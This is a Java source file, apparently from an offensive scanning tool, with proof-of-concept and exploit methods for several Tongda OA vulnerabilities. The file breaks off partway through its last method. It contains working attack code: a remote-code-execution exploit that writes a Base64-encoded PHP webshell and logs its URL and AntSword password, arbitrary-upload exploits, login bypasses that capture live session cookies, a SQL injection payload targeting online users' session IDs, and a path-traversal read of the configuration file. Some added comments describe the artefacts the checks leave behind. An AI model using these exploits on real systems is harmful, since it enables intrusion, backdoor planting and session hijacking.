package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;

import java.net.MalformedURLException;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@BasicMapping(uri = "通达")
public class TongDaController extends Controller implements BasicController{
    /** Shared standard (RFC 4648 "basic") Base64 encoder. */
    static final Base64.Encoder encoder = Base64.getEncoder();
    /** Shared standard Base64 decoder; not referenced by the code visible in this file. */
    static final Base64.Decoder decoder = Base64.getDecoder();

    /**
     * Base64-encodes the UTF-8 bytes of a string.
     *
     * @param text the text to encode; must not be {@code null}
     * @return the Base64 form of {@code text}
     */
    public static String encoder(String text) {
        byte[] utf8 = text.getBytes(StandardCharsets.UTF_8);
        return encoder.encodeToString(utf8);
    }
    /** Creates the controller; no initialisation is performed here. */
    public TongDaController() {
    }
    /**
     * Tongda OA V11.x remote-code-execution check and exploit, both sent through the
     * {@code activeTab} parameter of {@code /general/appbuilder/web/portal/gateway/getdata}.
     *
     * <p>POC: sends one GET whose {@code activeTab} value wraps a Base64 string in
     * {@code eval(base64_decode(...))} and reports a hit when the marker
     * {@code jodwahfoiawjifowadw} appears in the response body.
     *
     * <p>EXP: sends a first GET that asks the server to print its script path, keeps the
     * prefix ending in {@code webroot}, then sends a second GET that writes a PHP file
     * (name from {@code Utils.getRandomString(4)}) into that directory and logs its URL.
     * This branch modifies the target.
     *
     * <p>Defensive note: as built here, both branches show up in web-server access logs as
     * requests to the gateway path whose {@code activeTab} value contains
     * {@code print_r(__file__)} or {@code eval(base64_decode(}; on a vulnerable target the
     * EXP branch also leaves a new {@code .php} file in the web root.
     *
     * @param type   {@code POC} to probe, {@code EXP} to write the file
     * @param target base URL; it is concatenated directly with a path starting with "/"
     * @param args   for EXP, {@code args[0]} is read as a local file path (see the note in
     *               the EXP branch: its content is not used afterwards)
     * @throws MalformedURLException declared by the signature; presumably raised by the
     *         HttpRequest constructor for an invalid URL (not visible here)
     */
    @VulnerabilityDescriptionMapping(Description = "通达OA V11.x远程代码执行漏洞",SupportVulType = SupportVul.UploadFile)
    public void vul_tongdav11rce(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        // Start banner is appended directly to the UI log text area.
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  通达OA V11.x远程代码执行漏洞");

        // Request template; the token "shellcode" is replaced with the value to send.
        String url = "/general/appbuilder/web/portal/gateway/getdata?activeTab=shellcode&id=19&module=Carouselimage";
        switch (type) {
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        // Decoded with the platform default charset.
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){
                    // Deliberately ignored: a missing or non-String args[0] leaves path and mypayload null.
                }
                // NOTE(review): mypayload is assigned above but never read in the rest of this method.
                String exppaload1 = "%E5%27%19,1%3D%3Eprint_r(__file__))%3B/*";
                String exppaload2 = "file_put_contents(\"path\",base64_decode(\"PD9waHAgY2xhc3MgdGVzdHsgICAgcHVibGljICRuYW1lOyAgICBmdW5jdGlvbiBfX3dha2V1cCgpeyAgICAgICBldmFsKCIvKidBQUFkYXd3YWR3YWQnKi8iLiR0aGlzLT5uYW1lLiIvKicxNjFBV0RBV0RBVycqLyIpOyAgICB9fSR0ZXN0MyA9IHVuc2VyaWFsaXplKCRfR0VUWydhJ10pOz8+\"));";
                String expshellpath = Utils.getRandomString(4)+".php";
                // First request: path disclosure.
                HttpRequest httpRequest = new HttpRequest(target + url.replace("shellcode",exppaload1));
                Response response = httpRequest.Get("");

                // Greedy match up to the last "webroot" on a line of the response body.
                Pattern pattern = Pattern.compile(".*webroot");
                Matcher id = pattern.matcher(response.responseBody);
                String id1;
//                String id3;
                if (id.find()) {
                    id1 = id.group(0);
                    // The token "path" becomes <matched prefix>\<random name>.php (backslash separator),
                    // and the whole statement is Base64-encoded before being placed in the URL.
                    exppaload2 = encoder(exppaload2.replace("path",id1+"\\"+expshellpath));
                    HttpRequest httpRequest1 = new HttpRequest(target+url.replace("shellcode","%E5%27%19,1%3D%3Eeval(base64_decode(\""+exppaload2+"\")))%3B/*"));
                    // The response of the second request is discarded, so the "success" lines
                    // below are logged without confirming that the file was written.
                    httpRequest1.Get("");
                    WriteExpLog("[*]   上传成功\r\n");
                    WriteExpLog("[*}   上传路径为:"+target+"/"+expshellpath+"?a=O:4:\"test\":1:{s:4:\"name\";s:22:\"eval($_POST['b'].';');\";}");
                    WriteExpLog("\r\n");
                    WriteExpLog("[*]   请使用蚁剑进行连接，密码为b");
                }
                // No log line is written when the path pattern is not found.
                break;
            case POC:
                // The Base64 value presumably echoes the marker checked below; confirm by decoding.
                String pocpayload = "%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==%22)))%3B/*";
                HttpRequest httpRequest3 = new HttpRequest(target+url.replace("shellcode",pocpayload));
                Response response1 = httpRequest3.Get("");
                // Hit only when the marker string is reflected in the body.
                if (response1.responseBody.contains("jodwahfoiawjifowadw")){
                    WriteLog("\r\n");
                    WriteLog("【*】   存在通达OA V11.x远程代码执行漏洞");
                }else {
                    WriteLog("【-】   不存在通达OA V11.x远程代码执行漏洞");
                }

        }
    }


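    /**
     * Checks for the Tongda OA {@code logincheck_code.php} login bypass.
     *
     * <p>POC: fetches {@code /ispirit/login_code.php}, extracts the text between
     * {@code codeuid} and {@code authcode} from the body, posts it together with
     * {@code UID=1} to {@code /logincheck_code.php}, and reports a hit when that response
     * is a 200 whose body mentions {@code general\/index.php} and whose headers carry a
     * {@code PHPSESSID} cookie. Every other outcome is reported as "not vulnerable"; this
     * includes the case where the code was extracted but no {@code PHPSESSID} cookie came
     * back, which previously produced no log line at all.
     *
     * <p>On a hit the matched cookie text is written to the log. That value is a live
     * session cookie for the target, so the log should be handled as sensitive data.
     *
     * <p>EXP: not implemented; only a message is logged.
     *
     * @param type   {@code POC} or {@code EXP}
     * @param target base URL; it is concatenated directly with paths starting with "/"
     * @param args   unused
     * @throws MalformedURLException declared by the signature; presumably raised by the
     *         HttpRequest constructor for an invalid URL (not visible here)
     */
    @VulnerabilityDescriptionMapping(Description = "通达_OA_logincheck_code_php_登陆绕过漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_logincheck(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  通达_OA_logincheck_code_php_登陆绕过漏洞");

        String codePath = "/ispirit/login_code.php";
        String checkPath = "/logincheck_code.php";
        String formPrefix = "UID=1&CODEUID=_PC";
        switch (type) {
            case EXP:
                WriteExpLog("\n 通达_OA_logincheck_code_php_登陆绕过漏洞未有exp");
                break;
            case POC:
                Response codeResponse = new HttpRequest(target + codePath).Get("");
                Matcher codeMatcher = Pattern.compile("codeuid.*authcode").matcher(codeResponse.responseBody);

                // Stays null unless every condition for a hit is met.
                String sessionCookie = null;
                if (codeMatcher.find()) {
                    // Strip the JSON framing around the code value.
                    String codeUid = codeMatcher.group(0)
                            .replace("codeuid\":\"{", "")
                            .replace("}\",\"authcode", "");
                    Response loginResponse = new HttpRequest(target + checkPath).Post(formPrefix + codeUid);

                    // The header collection is searched through its string form.
                    Matcher cookieMatcher = Pattern.compile("PHPSESSID.*path=/")
                            .matcher(String.valueOf(loginResponse.responseHeader));
                    if (cookieMatcher.find()
                            && loginResponse.statusCode == 200
                            && loginResponse.responseBody.contains("general\\/index.php")) {
                        sessionCookie = cookieMatcher.group();
                    }
                }

                if (sessionCookie != null) {
                    WriteLog("\n 通达_OA_logincheck_code_php_登陆绕过漏洞 存在漏洞\r\n");
                    WriteLog("请复制以下cookie并对请求包进行替换，然后访问"+target+"/general/\r\n");
                    WriteLog(sessionCookie);
                } else {
                    // Single negative path, so a run never ends without a verdict.
                    WriteLog("\r\n");
                    WriteLog("[-]通达_OA_logincheck_code_php_登陆绕过漏洞 不存在漏洞");
                }
                break;
            default:
                break;
        }
    }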

/**
 * Checks for the Tongda OA v2014 {@code get_contactlist.php} information disclosure.
 *
 * <p>POC: requests the contact-list endpoint with a wildcard keyword and reports a hit
 * when the status code is 200. EXP: not implemented; only a message is logged.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target base URL; it is concatenated directly with a path starting with "/"
 * @param args   unused
 * @throws MalformedURLException declared by the signature; presumably raised by the
 *         HttpRequest constructor for an invalid URL (not visible here)
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_get_contactlist信息泄露(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞");

        final String probePath = "/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3";
        switch (type) {
            case EXP:
                WriteLog("\n vul_get_contactlist信息泄露 没有Exp");
                break;
            case POC:
                Response probe = new HttpRequest(target + probePath).Get("");
                // Only the status code is inspected: any server that answers 200 on this path
                // is reported as vulnerable, so a hit needs manual confirmation.
                String verdict = probe.statusCode == 200
                        ? "\n vul_get_contactlist信息泄露 存在漏洞"
                        : "\n vul_get_contactlist信息泄露 不存在漏洞";
                WriteLog(verdict);
                break;
        }
    }
/**
 * Tongda OA v2017 {@code action_upload.php} arbitrary file upload check and exploit.
 *
 * <p>Both branches post a hand-built multipart body to
 * {@code /module/ueditor/php/action_upload.php?action=uploadfile}. The body overrides the
 * uploader's {@code CONFIG[...]} values (file field name, maximum size, path format,
 * allowed extension {@code .php}) and carries a file part named {@code test.php}.
 *
 * <p>POC: uploads the template as is (file body {@code <?php phpinfo();?>}, path format
 * {@code tcmd}) and then requests {@code /tcmd.php}. A hit is reported when both responses
 * have status 200. This check is not read-only: on a vulnerable target it leaves
 * {@code tcmd.php} in the web root, and nothing in this method removes it.
 *
 * <p>EXP: substitutes the content of the local file named by {@code args[0]} for the
 * template's file body, uploads it, and requests a {@code .php} path built from
 * {@code Utils.getRandomString(5)}.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target base URL; it is concatenated directly with paths starting with "/"
 * @param args   for EXP, {@code args[0]} is the local path of the file to upload
 * @throws MalformedURLException declared by the signature; presumably raised by the
 *         HttpRequest constructor for an invalid URL (not visible here)
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v2017 action_upload.php 任意文件上传漏洞",SupportVulType =SupportVul.UploadFile )
    public void vul_action_upload文件上传(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  通达OA v2017 action_upload.php 任意文件上传漏洞");

    String url = "/module/ueditor/php/action_upload.php?action=uploadfile";
    // Multipart template. The delimiter lines are "--" plus the boundary declared in the
    // Content-Type header that both branches add below.
    String data = "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[fileFieldName]\"\r\n" +
            "\r\n" +
            "ffff\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[fileMaxSize]\"\r\n" +
            "\r\n" +
            "1000000000\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[filePathFormat]\"\r\n" +
            "\r\n" +
            "tcmd\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"CONFIG[fileAllowFiles][]\"\r\n" +
            "\r\n" +
            ".php\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"ffff\"; filename=\"test.php\"\r\n" +
            "Content-Type: application/octet-stream\r\n" +
            "\r\n" +
            "<?php phpinfo();?>\r\n" +
            "-----------------------------55719851240137822763221368724\r\n" +
            "Content-Disposition: form-data; name=\"mufile\"\r\n" +
            "\r\n" +
            "submit\r\n" +
            "-----------------------------55719851240137822763221368724--";
    switch (type) {
        case EXP:

            // NOTE(review): a varargs call without extra arguments passes an empty array, not
            // null, so this test does not protect the args[0] access below.
            if (args!=null){
                String path = (String) args[0];
                String mypayload = "";
                String RandomExp =Utils.getRandomString(5);
                try {
                    // Decoded with the platform default charset.
                    byte[] bytes = Utils.readFile(path);
                    mypayload = new String(bytes);
                }catch (Exception e){
                    // The read failure is logged and the upload still proceeds with an empty file body.
                    WriteExpLog("\n [*] 文件读取失败");
                }
                // Fill the template: path-format field, then the file body.
                data = data.replace("tcmd","RandomExp");
                data = data.replace("<?php phpinfo();?>",mypayload);
                HttpRequest httpRequest = new HttpRequest(target + url);
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=---------------------------55719851240137822763221368724");
                Response response = httpRequest.Post(data);

                HttpRequest httpRequest2 = new HttpRequest(target + "/"+RandomExp+".php");
                Response response2 = httpRequest2.Get("");

                // The verdict relies on status codes only; the bodies are not inspected.
                if (response.statusCode==200 && response2.statusCode==200){
                    WriteLog("\n vul_action_upload文件上传 存在漏洞");
                }else {
                    WriteLog("\n vul_action_upload文件上传 不存在漏洞");
                }
            }else {
                WriteExpLog("\n 请指定文件路径");
            }
            break;
        case POC:

            HttpRequest httpRequest = new HttpRequest(target + url);
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=---------------------------55719851240137822763221368724");
            Response response = httpRequest.Post(data);

            // Fetch the path the template asks the uploader to write to.
            HttpRequest httpRequest2 = new HttpRequest(target + "/tcmd.php");
            Response response2 = httpRequest2.Get("");

            // Status codes only: a server that answers 200 to both requests for unrelated
            // reasons is reported as vulnerable.
            if (response.statusCode==200 && response2.statusCode==200){
                WriteLog("\n vul_action_upload文件上传 存在漏洞");
            }else {
                WriteLog("\n vul_action_upload文件上传 不存在漏洞");
            }
    }
}

/**
 * Entry point for the Tongda OA v11.5 {@code login_code.php} arbitrary-user-login check.
 *
 * <p>POC delegates to {@link #getV11Session(String)}, which does the requests and the
 * logging. EXP is not implemented; only a message is logged.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target base URL handed to {@code getV11Session}
 * @param args   unused
 * @throws MalformedURLException declared by the signature and by {@code getV11Session}
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v11.5 login_code.php 任意用户登录",SupportVulType = SupportVul.信息泄露)
    public void vul_session泄露(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  通达OA v11.5 login_code.php 任意用户登录");

        switch (type) {
            case POC:
                // The Boolean result is not used here; the helper logs the verdict itself.
                getV11Session(target);
                break;
            case EXP:
                WriteLog("\n[*] vul_信息泄露漏洞 没有Exp");
                break;
        }
    }
/**
 * Placeholder for the Tongda OA v11.9 {@code upsharestatus} back-end SQL injection.
 *
 * <p>No request is sent in either mode: EXP logs that no exploit exists, and POC logs that
 * the issue needs parameters that cannot be verified automatically, with a reference URL.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target unused
 * @param args   unused
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v11.9 upsharestatus 后台SQL注入漏洞" ,SupportVulType = SupportVul.SQLInjection)
public void vul_upsharestatusSqlInjection(Poc_Exp type, String target,Object... args){
    String message;
    switch (type) {
        case EXP:
            message = "\n vul_upsharestatusSqlInjection 没有Exp";
            break;
        case POC:
            message = "\n 漏洞需要相关参数，无法自动验证 http://www.i-dock.net/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20upsharestatus%20%E5%90%8E%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html";
            break;
        default:
            // Any other mode logs nothing.
            message = null;
    }
    if (message != null) {
        WriteLog(message);
    }
}

/**
 * Checks for the Tongda OA v11.8 {@code api.ali.php} arbitrary file upload.
 *
 * <p>POC: posts a multipart body with one file part ({@code fb6790f4.json}) to
 * {@code /mobile/api/api.ali.php}, then requests {@code /inc/package/work.php} with an
 * {@code id} value that points, through {@code ../} segments, at the uploaded file under
 * {@code attach/approve_center/2209/}. A hit is reported when the second response body
 * contains {@code OK}.
 *
 * <p>This check is not read-only. It uploads a file to the target, and the Base64 field
 * {@code a} in that file appears to decode to a {@code file_put_contents} call that writes
 * {@code fb6790f4.php} (confirm by decoding). Nothing in this method removes either file,
 * so the names {@code fb6790f4.json} and {@code fb6790f4.php} are the artefacts to look for
 * on a host that has been scanned with it.
 *
 * <p>EXP: not implemented; a message and a reference URL are logged.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target base URL; it is concatenated directly with paths starting with "/"
 * @param args   unused
 * @throws MalformedURLException declared by the signature; presumably raised by the
 *         HttpRequest constructor for an invalid URL (not visible here)
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v11.8 api.ali.php 任意文件上传漏洞", SupportVulType = SupportVul.UploadFile)
public void vul_api_ali_UploadFile(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  通达OA v11.8 api.ali.php 任意文件上传漏洞");

    switch (type) {
        case EXP:
            WriteExpLog("\n vul_api_ali_UploadFile 没有Exp");
            WriteExpLog("\n 移步看: http://www.i-dock.net/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.8%20api.ali.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html");
            break;
        case POC:
            // Multipart body: one JSON file part. The body starts with a bare "\n" before
            // the first delimiter line.
            String data = "\n" +
                    "--502f67681799b07e4de6b503655f5cae\r\n" +
                    "Content-Disposition: form-data; name=\"file\"; filename=\"fb6790f4.json\"\r\n" +
                    "Content-Type: application/octet-stream\r\n" +
                    "\r\n" +
                    "{\"modular\":\"AllVariable\",\"a\":\"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==\",\"dataAnalysis\":\"{\\\"a\\\":\\\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\\\"}\"}\r\n" +
                    "--502f67681799b07e4de6b503655f5cae--\r\n";
            HttpRequest httpRequest = new HttpRequest(target+"/mobile/api/api.ali.php");
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae");
            // The upload response is discarded; only the follow-up request decides the verdict.
            httpRequest.Post(data);

            HttpRequest httpRequest1 = new HttpRequest(target+"/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2209/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4");
            Response response = httpRequest1.Get("");
            // "OK" is a short, common substring; a page containing it for another reason is
            // also reported as a hit, so confirm manually.
            if (response.responseBody.contains("OK")){
                WriteLog("vul_api_ali_UploadFile 存在漏洞");
            }else {
                WriteLog("\nvul_api_ali_UploadFile 不存在漏洞");
            }

    }
}
/**
 * Probes the Tongda OA v11.x {@code login_code.php} / {@code logincheck_code.php} login
 * flow and reports whether {@code /general/index.php} can be opened afterwards.
 *
 * <p>Steps: GET {@code /general/login_code.php}; take the text after the last "{" of the
 * body as the code value; POST it with {@code UID=1} to {@code /logincheck_code.php}; copy
 * the {@code Set-Cookie} value of that response into a {@code Cookie} header; GET
 * {@code /general/index.php}. The target is reported as vulnerable when that last body does
 * not contain {@code window.top.location='/'}.
 *
 * <p>On a hit the cookie sent with the last request is written to the log. It is a live
 * session cookie, so the log should be handled as sensitive data.
 *
 * @param target base URL; it is concatenated directly with paths starting with "/"
 * @return {@code true} when the index page did not contain the redirect marker,
 *         {@code false} when it did or when any exception occurred
 * @throws MalformedURLException declared by the signature; every exception raised inside
 *         the body is caught by the outer {@code catch (Exception e)}
 */
public Boolean getV11Session(String target) throws MalformedURLException {
    try {
        String checkUrl = target + "/general/login_code.php";

        String resText = new HttpRequest(checkUrl).Get("").responseBody;
        // Keep what follows the last "{" and strip the trailing JSON framing and CRLF.
        String[] resTextSplit = resText.split("\\{");
        String codeUid = resTextSplit[resTextSplit.length-1].replace("}\"}", "").replace("\r\n", "");
        String data = "CODEUID=" + codeUid + "&UID=1"; // form fields: {'CODEUID': '{'+codeUid+'}', 'UID': int(1)}
        Response response = new HttpRequest(target + "/logincheck_code.php").Post(data);

        HttpRequest req = new HttpRequest(target + "/general/index.php");
        String tmp_cookie= null;
        // Check: replay the returned cookie against the index page.
        try {
            // The header value is taken through toString() and the list brackets are removed.
            tmp_cookie = response.responseHeader.get("Set-Cookie").toString();
            tmp_cookie = tmp_cookie.replace("[","");
            tmp_cookie = tmp_cookie.replace("]","");
            req.addHeaders("Cookie", tmp_cookie);

        }catch (Exception e){
            // Deliberately ignored: without a Set-Cookie header the index request is sent with no cookie.
        }
        Response response1 = req.Get("");

        // NOTE(review): the verdict is "marker absent", so an error page, an empty body, or
        // any page without this exact script text is also reported as a hit; confirm manually.
        if (!response1.responseBody.contains("window.top.location='/'")) {
                WriteLog("\n getV11Session 检测到漏洞 Session：" + response1.requestHeader.get("Cookie"));
                WriteLog("\n 拿着session 去登录" + target+"/general/index.php");

            return true;
        } else {
            WriteLog("\n getV11Session 未检测到漏洞 ");
            return false;
        }


    } catch (Exception e) {
        // Any failure (network, parsing, null body) ends the check with a generic message.
        WriteLog("\n function getV11Session 出现异常");
        return false;
    }
}

//@VulnerabilityDescriptionMapping(Description = "通达OA登录认证绕过 header.inc.php?_ZQA_ID=3fb5b8eadff9c793",SupportVulType = SupportVul.信息泄露)
//public void vul_header_inc(Poc_Exp type, String target,Object... args){
//        WriteLog("通达OA登录认证绕过 header.inc.php?_ZQA_ID=3fb5b8eadff9c793");
//
//    switch (type) {
//        case EXP:
//            WriteLog("\n vul_upsharestatusSqlInjection 没有Exp");
//            break;
//        case POC:
//            WriteLog("\n 漏洞需要相关参数，无法自动验证 http://www.i-dock.net/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20upsharestatus%20%E5%90%8E%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html");
//    }
//
//}

    /**
     * Checks for the Tongda OA v2017 {@code video_file.php} arbitrary file download.
     *
     * <p>POC: requests {@code video_file.php} with {@code MEDIA_DIR=../../../inc/} and
     * {@code MEDIA_NAME=oa_config.php}, and reports a hit when the status is 200 and the body
     * contains {@code ROOT_PATH}. EXP: not implemented; only a message is logged.
     *
     * <p>The method name does not match the endpoint it tests; it is kept because the name is
     * part of the class's public interface.
     *
     * @param type   {@code POC} or {@code EXP}
     * @param target base URL; it is concatenated directly with a path starting with "/"
     * @param args   unused
     * @throws MalformedURLException declared by the signature; presumably raised by the
     *         HttpRequest constructor for an invalid URL (not visible here)
     */
    @VulnerabilityDescriptionMapping(Description = "通达OA v2017 video_file.php 任意文件下载漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_header_inc(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("通达OA v2017 video_file.php 任意文件下载漏洞");
        final String downloadPath = "/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php";
        switch (type) {
            case EXP:
                WriteLog("\n 信息泄露 没有Exp");
                break;
            case POC:
                Response probe = new HttpRequest(target + downloadPath).Get("");
                // Both signals are required: a 200 status and the configuration marker in the body.
                boolean leaked = probe.statusCode == 200 && probe.responseBody.contains("ROOT_PATH");
                if (!leaked) {
                    WriteFailLog("不存在漏洞");
                    break;
                }
                WriteSuccessLog("存在漏洞 通达OA v2017 video_file.php 任意文件下载漏洞");
                break;
        }
    }

/**
 * Checks for the Tongda OA v11.5 {@code swfupload_new.php} SQL injection.
 *
 * <p>POC: posts a multipart form ({@code ATTACHMENT_ID}, {@code ATTACHMENT_NAME},
 * {@code FILE_SORT}, {@code SORT_ID}) to {@code /general/file_folder/swfupload_new.php}
 * and reports a hit when the status is 200 and the body contains {@code FILE_CONTENT}.
 * On a hit the whole response body is written to the log. EXP: not implemented.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target base URL; it is concatenated directly with a path starting with "/"
 * @param args   unused
 * @throws MalformedURLException declared by the signature; presumably raised by the
 *         HttpRequest constructor for an invalid URL (not visible here)
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v11.5 swfupload_new.php SQL注入漏洞",SupportVulType = SupportVul.SQLInjection)
public void vul_swfupload_new(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("通达OA v11.5 swfupload_new.php SQL注入漏洞");
    String url = "/general/file_folder/swfupload_new.php";
    // Multipart template; the SORT_ID part has a header line but no value line.
    String data = "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"ATTACHMENT_ID\"\r\n" +
            "\r\n" +
            "1\r\n" +
            "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"ATTACHMENT_NAME\"\r\n" +
            "\r\n" +
            "1\r\n" +
            "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"FILE_SORT\"\r\n" +
            "\r\n" +
            "2\r\n" +
            "------------GFioQpMK0vv2\r\n" +
            "Content-Disposition: form-data; name=\"SORT_ID\"\r\n" +
            "\r\n" +
            "------------GFioQpMK0vv2--\r\n";
    switch (type) {
        case EXP:
            WriteLog("\n SQL注入 没有Exp");
            break;
        case POC:
            HttpRequest httpRequest_poc = new HttpRequest(target+url);
            // NOTE(review): the header is registered under the name "multipart/form-data";
            // the other upload checks in this class use the name "Content-Type". Whether
            // HttpRequest sets a content type on its own is not visible here, so a negative
            // result from this check should not be relied on until that is confirmed.
            httpRequest_poc.addHeaders("multipart/form-data","multipart/form-data; boundary=----------GFioQpMK0vv2");
            Response response = httpRequest_poc.Post(data);

            if (response.statusCode==200&& response.responseBody.contains("FILE_CONTENT")){
                WriteSuccessLog("存在漏洞 ");
                // The raw response body goes to the log and may contain data from the target.
                WriteLog(response.responseBody);
            }else {
                WriteFailLog("不存在漏洞");
            }
    }
}


/**
 * Checks for the Tongda OA v11.6 {@code insert} SQL injection.
 *
 * <p>POC: posts a form whose field name carries a SQL fragment to
 * {@code /general/document/index.php/recv/register/insert} and reports a hit when the
 * status code is 302. On a hit a second POST is made and its body is logged.
 * EXP: not implemented; only a message is logged.
 *
 * @param type   {@code POC} or {@code EXP}
 * @param target base URL; it is concatenated directly with a path starting with "/"
 * @param args   unused
 * @throws MalformedURLException declared by the signature; presumably raised by the
 *         HttpRequest constructor for an invalid URL (not visible here)
 */
@VulnerabilityDescriptionMapping(Description = "通达OA v11.6 insert SQL注入漏洞",SupportVulType = SupportVul.SQLInjection)
public void vul_insert(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("通达OA v11.6 insert SQL注入漏洞");
    String url = "/general/document/index.php/recv/register/insert";
    switch (type) {
        case EXP:
            WriteLog("\n SQL注入 没有Exp");
            break;
        case POC:
            HttpRequest httpRequest_poc1 = new HttpRequest(target+url);
            String data = "title)values(\"'\"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=";
            Response response = httpRequest_poc1.Post(data);

            // NOTE(review): the status code is the only signal. Any redirect from this path
            // (for example to a login page) is reported as a hit; confirm manually.
            if (response.statusCode==302){
                WriteSuccessLog("存在漏洞 ");
                WriteLog(response.responseBody);
                // httpRequest_poc2 and data2 are constructed here but are not passed to any
                // call in this method; the request below re-posts `data` through
                // httpRequest_poc1, and that response body is what gets logged.
                HttpRequest httpRequest_poc2 = new HttpRequest(target+url);
                String data2 = "title)values(\"'\"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=";
                Response response2 = httpRequest_poc1.Post(data);
                WriteLog("在线用户session：拿着session访问/general/index.php"+response2.responseBody);

            }else {
                WriteFailLog("不存在漏洞 状态码:"+response.statusCode);
            }
    }
}

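    /**
     * Checks for the Tongda OA v11.7 {@code auth_mobi.php} online-user login issue.
     *
     * <p>POC: requests {@code /mobile/auth_mobi.php?Avatar=1&uid=1&P_VER=1} and reports a hit
     * when the status is 200 and the body does not contain {@code RELOGIN}. On a hit the
     * {@code Set-Cookie} value is logged when the response has one; a response without that
     * header (or without a body) no longer ends the check with a NullPointerException.
     * EXP: not implemented; only a message is logged.
     *
     * <p>The verdict is "marker absent", so any 200 page without {@code RELOGIN} is reported
     * as a hit and should be confirmed manually. A logged cookie is a live session value and
     * the log should be handled as sensitive data.
     *
     * @param type   {@code POC} or {@code EXP}
     * @param target base URL; it is concatenated directly with a path starting with "/"
     * @param args   unused
     * @throws MalformedURLException declared by the signature; presumably raised by the
     *         HttpRequest constructor for an invalid URL (not visible here)
     */
    @VulnerabilityDescriptionMapping(Description = "通达OA v11.7 auth_mobi.php 在线用户登录漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_auth_mobi(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("通达OA v11.7 auth_mobi.php 在线用户登录漏洞");
        String url = "/mobile/auth_mobi.php?Avatar=1&uid=1&P_VER=1";
        switch (type) {
            case EXP:
                WriteLog("\n SQL注入 没有Exp");
                break;
            case POC:
                Response response = new HttpRequest(target+url).Get("");
                boolean hit = response.statusCode==200
                        && response.responseBody != null
                        && !response.responseBody.contains("RELOGIN");
                if (hit){
                    WriteSuccessLog("存在漏洞 ");
                    // The header may be missing even on a 200 response.
                    Object setCookie = response.responseHeader == null
                            ? null
                            : response.responseHeader.get("Set-Cookie");
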